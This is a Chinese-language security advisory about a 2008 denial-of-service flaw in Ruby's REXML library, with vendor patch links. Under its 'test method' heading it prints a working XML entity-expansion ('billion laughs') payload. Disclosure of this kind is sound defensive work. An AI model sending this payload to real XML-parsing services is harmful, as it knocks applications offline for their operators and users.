发布日期：2008-08-23
更新日期：2008-08-25

受影响系统：

Yukihiro Matsumoto Ruby 1.9.x
Yukihiro Matsumoto Ruby 1.8.x

描述：

---

BUGTRAQ  ID: 30802

Ruby是一种功能强大的面向对象的脚本语言。

Ruby使用REXML库解析入站的XML请求，如果用户受骗访问了恶意网页的话，攻击者就可以使用一种称为XML实体爆炸（entity explosion）的技术远程关闭任何解析XML的应用程序，包括Ruby和Ruby on Rails。

<*来源：Michael Koziarski
        Luka Treiber
  
  链接：http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/
        http://weblog.rubyonrails.com/2008/8/23/dos-vulnerabilities-in-rexml
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
  <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
  <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
  <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
  <!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
  <!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>

建议：

---

厂商补丁：

Yukihiro Matsumoto
------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.ruby-lang.org/security/20080823rexml/rexml-expansion-fix.rb